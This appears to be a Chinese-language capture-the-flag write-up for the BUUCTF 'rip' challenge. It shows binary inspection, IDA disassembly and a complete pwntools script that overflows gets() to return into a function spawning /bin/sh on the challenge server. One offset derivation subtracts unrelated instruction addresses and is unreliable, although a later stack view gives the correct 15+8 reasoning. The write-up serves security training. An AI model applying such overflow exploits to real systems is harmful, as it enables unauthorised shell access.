rip
- 1 file
file pwn1
pwn1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV)
- 2 checksec
checksec pwn1
[*] '/home/kali/Desktop/pwn1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE
没有加保护
- 3 ida F12+shift strings windows
# 查看关键词
Address Length Type String
LOAD:00000000004002A8 0000001C C /lib64/ld-linux-x86-64.so.2
LOAD:00000000004003B9 0000000A C libc.so.6
LOAD:00000000004003C3 00000005 C gets
LOAD:00000000004003C8 00000005 C puts
LOAD:00000000004003CD 00000007 C system
LOAD:00000000004003D4 00000012 C __libc_start_main
LOAD:00000000004003E6 0000000C C GLIBC_2.2.5
LOAD:00000000004003F2 0000000F C __gmon_start__
.rodata:0000000000402004 0000000D C please input
.rodata:0000000000402011 0000000A C ok,bye!!!
.rodata:000000000040201B 00000008 C /bin/sh
.eh_frame:00000000004020DF 00000006 C ;*3$"
gets():函数除了结束符,没有输入长度限制,存在溢出
存在fun()函数
; Attributes: bp-based frame;
public fun
fun proc near
; __unwind {
push rbp
mov rbp, rsp
lea rdi, command ; "/bin/sh"
call _system
nop
pop rbp
retn
; } // starts at 401186
fun endp
- IDA view
xt:0000000000401142 ; __unwind {
.text:0000000000401142 push rbp
.text:0000000000401143 mov rbp, rsp
.text:0000000000401146 sub rsp, 10h
.text:000000000040114A lea rdi, s ; "please input"
.text:0000000000401151 call _puts
.text:0000000000401156 lea rax, [rbp+s]
.text:000000000040115A mov rdi, rax
.text:000000000040115D mov eax, 0
.text:0000000000401162 call _gets
.text:0000000000401167 lea rax, [rbp+s]
.text:000000000040116B mov rdi, rax ; s
.text:000000000040116E call _puts
.text:0000000000401173 lea rdi, aOkBye ; "ok,bye!!!"
.text:000000000040117A call _puts
.text:000000000040117F mov eax, 0
.text:0000000000401184 leave
.text:0000000000401185 retn
.text:0000000000401185 ; } // starts at 401142
.text:0000000000401185 main endp
.text:0000000000401185
.text:0000000000401186
.text:0000000000401186 ; =============== S U B R O U T I N E =======================================
.text:0000000000401186
.text:0000000000401186 ; Attributes: bp-based frame
.text:0000000000401186
.text:0000000000401186 public fun
.text:0000000000401186 fun proc near
.text:0000000000401186 ; __unwind {
.text:0000000000401186 push rbp
.text:0000000000401187 mov rbp, rsp
.text:000000000040118A lea rdi, command ; "/bin/sh"
.text:0000000000401191 call _system
.text:0000000000401196 nop
.text:0000000000401197 pop rbp
.text:0000000000401198 retn
.text:0000000000401198 ; } // starts at 401186
.text:0000000000401198 fun endp
.text:0000000000401162 call _gets
.text:0000000000401185 retn
.text:0000000000401185 ; } // starts at 401142
.text:0000000000401186 public fun
计算偏移:1185-1162 = 23
payload = b'A' * 23 + p64(0x401186)
- 查看stack of main
-0000000000000010 db ? ; undefined
-000000000000000F s db ?
-000000000000000E db ? ; undefined
-000000000000000D db ? ; undefined
-000000000000000C db ? ; undefined
-000000000000000B db ? ; undefined
-000000000000000A db ? ; undefined
-0000000000000009 db ? ; undefined
-0000000000000008 db ? ; undefined
-0000000000000007 db ? ; undefined
-0000000000000006 db ? ; undefined
-0000000000000005 db ? ; undefined
-0000000000000004 db ? ; undefined
-0000000000000003 db ? ; undefined
-0000000000000002 db ? ; undefined
-0000000000000001 db ? ; undefined
+0000000000000000 s db 8 dup(?)
+0000000000000008 r db 8 dup(?)
+0000000000000010
+0000000000000010 ; end of stack variables
从F至0 发现只需存入15个字节,即可覆盖至栈顶,然后加8字节可覆盖至RET,即可劫持函数返回地址
payload = b'A' * (15+8) + p64(0x401186)
完整EPX
#!/usr/bin/python3
# coding=utf-8
from pwn import *
port = 29566
p = remote('node3.buuoj.cn', 29566)
payload = b'a' * 15 + b'b'*8 + p64(0x401186)
#print(payload)
#gdb.attach(p)
p.sendline(payload)
p.interactive()